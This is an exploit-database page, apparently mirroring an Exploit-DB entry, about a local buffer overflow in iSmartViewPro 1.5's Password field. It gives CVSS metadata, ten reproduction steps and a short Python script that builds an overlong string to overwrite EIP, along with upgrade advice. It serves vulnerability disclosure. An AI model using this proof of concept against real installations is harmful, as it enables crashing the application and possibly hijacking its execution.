header-logo
Suggest Exploit
vendor:
iSmartViewPro
by:
Javier Enrique Rodriguez Gutierrez
7.8
CVSS
HIGH
Buffer Over Flow Local
119
CWE
Product Name: iSmartViewPro
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:securimport:ismartviewpro:1.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Professional x64 es
2018

iSmartViewPro 1.5 – ‘Password’ Buffer Overflow

A buffer overflow vulnerability exists in iSmartViewPro 1.5 when a long string is sent as input to the 'Password' field. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. To exploit this vulnerability, an attacker must first run a python code to generate a malicious string, copy the content to clipboard, open iSmartViewPro, click the '+' button, select 'add device manually', enter 'admin' as the device alias, enter '0.0.0.0' as the DNS/IP/DID, enter 'admin' as the account, paste the malicious string in the 'Password' field and save. This will trigger the buffer overflow.

Mitigation:

Upgrade to the latest version of iSmartViewPro.
Source

Exploit-DB raw data:

# Exploit Title: iSmartViewPro 1.5  - 'Password' Buffer Overflow
# Discovery by: Javier Enrique Rodriguez Gutierrez
# Discovery Date: 2018-08-09
# Vendor Homepage: https://securimport.com/
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Vulnerability Type: Buffer Over Flow Local
# Tested on OS: Windows 7 Professional x64 es
  
# Steps to Produce the BoF: 
# 1.- Run python code : python generate.py
# 2.- Open generate.txt and copy content to clipboard
# 3.- Open iSmartViewPro
# 4.- clic button "+"
# 5.- Select "add device manually"
# 6.- device alias -> "admin"
# 7.- DNS/IP/DID -> "0.0.0.0"
# 8.- acount -> "admin"
# 9.- paste ClipBoard on "Password"
# 10.- Save
# 11.- BoF
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
buffer = "\x41" * 447
eip = "\x42" * 4
f = open ("generate.txt", "w")
f.write(buffer + eip)
f.close()

Navigation

Suggest Exploit

Services By CQR